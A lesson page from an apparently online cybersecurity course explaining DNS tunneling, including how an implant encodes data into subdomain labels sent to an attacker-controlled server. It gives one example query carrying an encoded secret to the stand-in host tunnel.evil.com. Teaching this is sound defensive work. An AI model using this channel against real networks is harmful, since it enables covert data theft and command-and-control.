0PricingLogin
Cyber Security Academy · Lesson

DNS Tunneling and Exfiltration

Smuggling data over DNS.

Smuggling Data Over DNS

DNS tunneling encodes arbitrary data inside DNS queries and responses, turning the name system into a covert communication channel. Because nearly every network allows DNS to leave the perimeter, it is a favorite path for data exfiltration and command-and-control (C2).

If your firewall blocks everything but the resolver still answers, attackers can route a full bidirectional channel through DNS.

How the Channel Works

The attacker controls the authoritative name server for a domain, say tunnel.evil.com. The implant encodes outbound data into the subdomain (left-hand label) of queries:

  • Data goes out as <base32-chunk>.tunnel.evil.com.
  • The authoritative server returns instructions inside TXT, CNAME, or NULL records.

Each query/answer pair carries a small payload chunk.

ZXhmaWx0cmF0ZWQtc2VjcmV0.tunnel.evil.com
# Encoded chunk smuggled in the query label

All lessons in this course

  1. How DNS Works and Its Risks
  2. DNS Spoofing and Cache Poisoning
  3. DNS Tunneling and Exfiltration
  4. DNSSEC and DNS Filtering
← Back to Cyber Security Academy